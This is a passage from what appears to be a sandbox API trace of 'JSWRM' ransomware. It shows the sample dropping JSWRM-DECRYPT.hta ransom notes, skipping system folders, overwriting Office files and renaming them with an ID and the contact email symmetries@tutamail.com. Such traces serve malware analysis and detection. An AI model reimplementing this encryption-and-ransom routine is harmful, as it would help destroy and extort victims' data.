(lpString1="CONVERT", lpString2="...") returned 1 [0129.252] lstrcmpiW (lpString1="CONVERT", lpString2="windows") returned -1 [0129.252] lstrcmpiW (lpString1="CONVERT", lpString2="recovery") returned -1 [0129.252] lstrcmpiW (lpString1="CONVERT", lpString2="perflogs") returned -1 [0129.252] lstrcmpiW (lpString1="CONVERT", lpString2="documents and settings") returned -1 [0129.253] lstrcmpiW (lpString1="CONVERT", lpString2="$RECYCLE.BIN") returned 1 [0129.253] lstrcmpiW (lpString1="CONVERT", lpString2="system volume information") returned -1 [0129.253] lstrcmpiW (lpString1="CONVERT", lpString2="msocache") returned -1 [0129.253] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\CONVERT\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\convert\\jswrm-decrypt.hta")) returned 0xffffffff [0129.253] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0129.253] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345baf4, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0129.253] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\CONVERT\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\convert\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0129.254] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0129.254] WriteFile (in: hFile=0x45c, lpBuffer=0x345bc08*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345bbd4, lpOverlapped=0x0 | out: lpBuffer=0x345bc08*, lpNumberOfBytesWritten=0x345bbd4*=0x230c, lpOverlapped=0x0) returned 1 [0129.255] CloseHandle (hObject=0x45c) returned 1 [0129.255] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\CONVERT\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\convert\\jswrm-decrypt.hta")) returned 0x20 [0129.255] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\CONVERT\\*.*", lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xec4ee541, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x6e5cc4e, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x43b39ccb, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName=".", cAlternateFileName="")) returned 0x231f40 [0129.255] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0129.255] FindNextFileW (in: hFindFile=0x231f40, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xec4ee541, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x6e5cc4e, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x43b39ccb, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="..", cAlternateFileName="")) returned 1 [0129.256] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0129.256] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0129.256] FindNextFileW (in: hFindFile=0x231f40, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xec4ee541, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf477755d, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf4cd4a32, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="1033", cAlternateFileName="")) returned 1 [0129.256] lstrcmpiW (lpString1="1033", lpString2=".") returned 1 [0129.256] lstrcmpiW (lpString1="1033", lpString2="..") returned 1 [0129.256] lstrcmpiW (lpString1="1033", lpString2="...") returned 1 [0129.256] lstrcmpiW (lpString1="1033", lpString2="windows") returned -1 [0129.256] lstrcmpiW (lpString1="1033", lpString2="recovery") returned -1 [0129.256] lstrcmpiW (lpString1="1033", lpString2="perflogs") returned -1 [0129.256] lstrcmpiW (lpString1="1033", lpString2="documents and settings") returned -1 [0129.256] lstrcmpiW (lpString1="1033", lpString2="$RECYCLE.BIN") returned 1 [0129.256] lstrcmpiW (lpString1="1033", lpString2="system volume information") returned -1 [0129.256] lstrcmpiW (lpString1="1033", lpString2="msocache") returned -1 [0129.256] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\CONVERT\\1033\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\convert\\1033\\jswrm-decrypt.hta")) returned 0xffffffff [0129.258] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0129.258] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345b78c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0129.258] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\CONVERT\\1033\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\convert\\1033\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0129.259] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0129.259] WriteFile (in: hFile=0x238, lpBuffer=0x345b8a0*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345b86c, lpOverlapped=0x0 | out: lpBuffer=0x345b8a0*, lpNumberOfBytesWritten=0x345b86c*=0x230c, lpOverlapped=0x0) returned 1 [0129.260] CloseHandle (hObject=0x238) returned 1 [0129.260] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\CONVERT\\1033\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\convert\\1033\\jswrm-decrypt.hta")) returned 0x20 [0129.260] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\CONVERT\\1033\\*.*", lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xec4ee541, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf4cd4a32, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x43b39ccb, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x225538, cFileName=".", cAlternateFileName="")) returned 0x232040 [0129.261] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0129.261] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xec4ee541, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf4cd4a32, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x43b39ccb, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x225538, cFileName="..", cAlternateFileName="")) returned 1 [0129.261] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0129.261] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0129.261] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf477755d, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf477755d, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf480feb5, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x3088, dwReserved0=0x60002, dwReserved1=0x225538, cFileName="DELIMR.FAE", cAlternateFileName="")) returned 1 [0129.261] lstrcmpiW (lpString1="DELIMR.FAE", lpString2=".") returned 1 [0129.261] lstrcmpiW (lpString1="DELIMR.FAE", lpString2="..") returned 1 [0129.261] lstrcmpiW (lpString1="DELIMR.FAE", lpString2="...") returned 1 [0129.261] lstrcmpiW (lpString1="DELIMR.FAE", lpString2="windows") returned -1 [0129.261] lstrcmpiW (lpString1="DELIMR.FAE", lpString2="recovery") returned -1 [0129.261] lstrcmpiW (lpString1="DELIMR.FAE", lpString2="perflogs") returned -1 [0129.261] lstrcmpiW (lpString1="DELIMR.FAE", lpString2="documents and settings") returned -1 [0129.261] lstrcmpiW (lpString1="DELIMR.FAE", lpString2="$RECYCLE.BIN") returned 1 [0129.261] lstrcmpiW (lpString1="DELIMR.FAE", lpString2="system volume information") returned -1 [0129.261] lstrcmpiW (lpString1="DELIMR.FAE", lpString2="msocache") returned -1 [0129.261] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DELIMR.FAE", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0129.261] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DELIMR.FAE", cchWideChar=10, lpMultiByteStr=0x345e870, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DELIMR.FAE", lpUsedDefaultChar=0x0) returned 10 [0129.261] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DELIMR.FAE", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0129.261] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DELIMR.FAE", cchWideChar=10, lpMultiByteStr=0x345e840, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DELIMR.FAE", lpUsedDefaultChar=0x0) returned 10 [0129.261] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0129.261] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0129.261] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\CONVERT\\1033\\DELIMR.FAE" (normalized: "c:\\program files\\microsoft office\\root\\office16\\convert\\1033\\delimr.fae"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0129.262] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=12424) returned 1 [0129.262] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0129.263] ReadFile (in: hFile=0x314, lpBuffer=0x27b348, nNumberOfBytesToRead=0x3080, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e534*=0x3080, lpOverlapped=0x0) returned 1 [0129.265] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0129.265] WriteFile (in: hFile=0x314, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x3080, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e530*=0x3080, lpOverlapped=0x0) returned 1 [0129.265] CloseHandle (hObject=0x314) returned 1 [0129.265] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\CONVERT\\1033\\DELIMR.FAE" (normalized: "c:\\program files\\microsoft office\\root\\office16\\convert\\1033\\delimr.fae"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\CONVERT\\1033\\DELIMR.FAE.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\convert\\1033\\delimr.fae.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0129.266] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x43b39ccb, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x43b39ccb, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x43b5fe29, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x60002, dwReserved1=0x225538, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0129.266] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0129.266] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0129.266] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0129.266] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0129.266] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0129.266] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0129.266] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0129.266] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0129.266] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0129.266] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0129.266] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0129.267] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x2412b8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0129.267] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0129.267] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241290, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0129.267] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf42b29f3, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf42b29f3, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf42d8c51, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0xb068, dwReserved0=0x60002, dwReserved1=0x225538, cFileName="LOCALDV.DLL", cAlternateFileName="")) returned 1 [0129.267] lstrcmpiW (lpString1="LOCALDV.DLL", lpString2=".") returned 1 [0129.267] lstrcmpiW (lpString1="LOCALDV.DLL", lpString2="..") returned 1 [0129.267] lstrcmpiW (lpString1="LOCALDV.DLL", lpString2="...") returned 1 [0129.267] lstrcmpiW (lpString1="LOCALDV.DLL", lpString2="windows") returned -1 [0129.267] lstrcmpiW (lpString1="LOCALDV.DLL", lpString2="recovery") returned -1 [0129.267] lstrcmpiW (lpString1="LOCALDV.DLL", lpString2="perflogs") returned -1 [0129.267] lstrcmpiW (lpString1="LOCALDV.DLL", lpString2="documents and settings") returned 1 [0129.267] lstrcmpiW (lpString1="LOCALDV.DLL", lpString2="$RECYCLE.BIN") returned 1 [0129.267] lstrcmpiW (lpString1="LOCALDV.DLL", lpString2="system volume information") returned -1 [0129.267] lstrcmpiW (lpString1="LOCALDV.DLL", lpString2="msocache") returned -1 [0129.267] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LOCALDV.DLL", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0129.267] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LOCALDV.DLL", cchWideChar=11, lpMultiByteStr=0x345e870, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LOCALDV.DLL", lpUsedDefaultChar=0x0) returned 11 [0129.267] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LOCALDV.DLL", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0129.267] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LOCALDV.DLL", cchWideChar=11, lpMultiByteStr=0x345e840, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LOCALDV.DLL", lpUsedDefaultChar=0x0) returned 11 [0129.267] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xec4ee541, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xec4ee541, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xec5f95b0, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x38f8, dwReserved0=0x60002, dwReserved1=0x225538, cFileName="OLADDR.FAE", cAlternateFileName="")) returned 1 [0129.267] lstrcmpiW (lpString1="OLADDR.FAE", lpString2=".") returned 1 [0129.267] lstrcmpiW (lpString1="OLADDR.FAE", lpString2="..") returned 1 [0129.267] lstrcmpiW (lpString1="OLADDR.FAE", lpString2="...") returned 1 [0129.267] lstrcmpiW (lpString1="OLADDR.FAE", lpString2="windows") returned -1 [0129.267] lstrcmpiW (lpString1="OLADDR.FAE", lpString2="recovery") returned -1 [0129.267] lstrcmpiW (lpString1="OLADDR.FAE", lpString2="perflogs") returned -1 [0129.267] lstrcmpiW (lpString1="OLADDR.FAE", lpString2="documents and settings") returned 1 [0129.267] lstrcmpiW (lpString1="OLADDR.FAE", lpString2="$RECYCLE.BIN") returned 1 [0129.267] lstrcmpiW (lpString1="OLADDR.FAE", lpString2="system volume information") returned -1 [0129.267] lstrcmpiW (lpString1="OLADDR.FAE", lpString2="msocache") returned 1 [0129.268] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OLADDR.FAE", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0129.268] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OLADDR.FAE", cchWideChar=10, lpMultiByteStr=0x345e870, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OLADDR.FAE", lpUsedDefaultChar=0x0) returned 10 [0129.268] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OLADDR.FAE", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0129.268] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OLADDR.FAE", cchWideChar=10, lpMultiByteStr=0x345e840, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OLADDR.FAE", lpUsedDefaultChar=0x0) returned 10 [0129.268] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0129.268] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0129.268] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\CONVERT\\1033\\OLADDR.FAE" (normalized: "c:\\program files\\microsoft office\\root\\office16\\convert\\1033\\oladdr.fae"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0129.268] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=14584) returned 1 [0129.268] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0129.268] ReadFile (in: hFile=0x314, lpBuffer=0x27b348, nNumberOfBytesToRead=0x38f0, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e534*=0x38f0, lpOverlapped=0x0) returned 1 [0129.271] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0129.271] WriteFile (in: hFile=0x314, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x38f0, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e530*=0x38f0, lpOverlapped=0x0) returned 1 [0129.271] CloseHandle (hObject=0x314) returned 1 [0129.271] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\CONVERT\\1033\\OLADDR.FAE" (normalized: "c:\\program files\\microsoft office\\root\\office16\\convert\\1033\\oladdr.fae"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\CONVERT\\1033\\OLADDR.FAE.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\convert\\1033\\oladdr.fae.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0129.272] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf1bce2f5, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf1bce2f5, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf1bce2f5, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x34a0, dwReserved0=0x60002, dwReserved1=0x225538, cFileName="OLAPPTR.FAE", cAlternateFileName="")) returned 1 [0129.272] lstrcmpiW (lpString1="OLAPPTR.FAE", lpString2=".") returned 1 [0129.272] lstrcmpiW (lpString1="OLAPPTR.FAE", lpString2="..") returned 1 [0129.272] lstrcmpiW (lpString1="OLAPPTR.FAE", lpString2="...") returned 1 [0129.272] lstrcmpiW (lpString1="OLAPPTR.FAE", lpString2="windows") returned -1 [0129.272] lstrcmpiW (lpString1="OLAPPTR.FAE", lpString2="recovery") returned -1 [0129.272] lstrcmpiW (lpString1="OLAPPTR.FAE", lpString2="perflogs") returned -1 [0129.272] lstrcmpiW (lpString1="OLAPPTR.FAE", lpString2="documents and settings") returned 1 [0129.272] lstrcmpiW (lpString1="OLAPPTR.FAE", lpString2="$RECYCLE.BIN") returned 1 [0129.272] lstrcmpiW (lpString1="OLAPPTR.FAE", lpString2="system volume information") returned -1 [0129.272] lstrcmpiW (lpString1="OLAPPTR.FAE", lpString2="msocache") returned 1 [0129.273] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OLAPPTR.FAE", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0129.273] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OLAPPTR.FAE", cchWideChar=11, lpMultiByteStr=0x345e870, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OLAPPTR.FAE", lpUsedDefaultChar=0x0) returned 11 [0129.273] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OLAPPTR.FAE", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0129.273] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OLAPPTR.FAE", cchWideChar=11, lpMultiByteStr=0x345e840, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OLAPPTR.FAE", lpUsedDefaultChar=0x0) returned 11 [0129.273] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0129.273] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0129.273] CreateFileW (lpFileName="C:\\Program Files\\Microsoft 